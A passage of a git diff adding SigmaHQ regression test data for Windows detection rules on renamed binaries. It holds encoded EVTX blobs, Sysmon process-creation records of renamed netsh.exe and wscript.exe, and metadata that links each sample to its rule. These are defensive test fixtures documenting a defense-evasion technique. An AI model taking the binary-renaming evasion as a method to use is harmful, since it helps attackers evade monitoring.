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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json new file mode 100644 index 000000000..9e76fe811 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:29:25.275782Z" + } + }, + "EventRecordID": 256823, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:29:25.272", + "ProcessGuid": "5AB40FD1-3EA5-68F9-2F31-000000003B02", + "ProcessId": 4564, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-netsh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Network Command Shell", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "netsh.exe", + "CommandLine": "renamed-netsh.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml new file mode 100644 index 000000000..1decc3d31 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml @@ -0,0 +1,13 @@ +id: e9861f82-77a9-4f8b-a418-0fbb6019588b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 + title: Potential Defense Evasion Via Binary Rename +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..f673a38d5aac285821db6a222e5bac14687ee871 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json new file mode 100644 index 000000000..679f6bc4a --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:28:22.116872Z" + } + }, + "EventRecordID": 256810, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:28:22.113", + "ProcessGuid": "5AB40FD1-3E66-68F9-2831-000000003B02", + "ProcessId": 4832, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-wscript.exe", + "FileVersion": "5.812.10240.16384", + "Description": "Microsoft ® Windows Based Script Host", + "Product": "Microsoft ® Windows Script Host", + "Company": "Microsoft Corporation", + "OriginalFileName": "wscript.exe", + "CommandLine": "renamed-wscript.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml new file mode 100644 index 000000000..c0be2dd95 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml @@ -0,0 +1,13 @@ +id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx new file mode 100644 index 0000000000000000000000000000000000000000..1cbd0fd5ec892ab92d9d24bf1ff8fcd12e061d40 GIT binary patch literal 69632 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 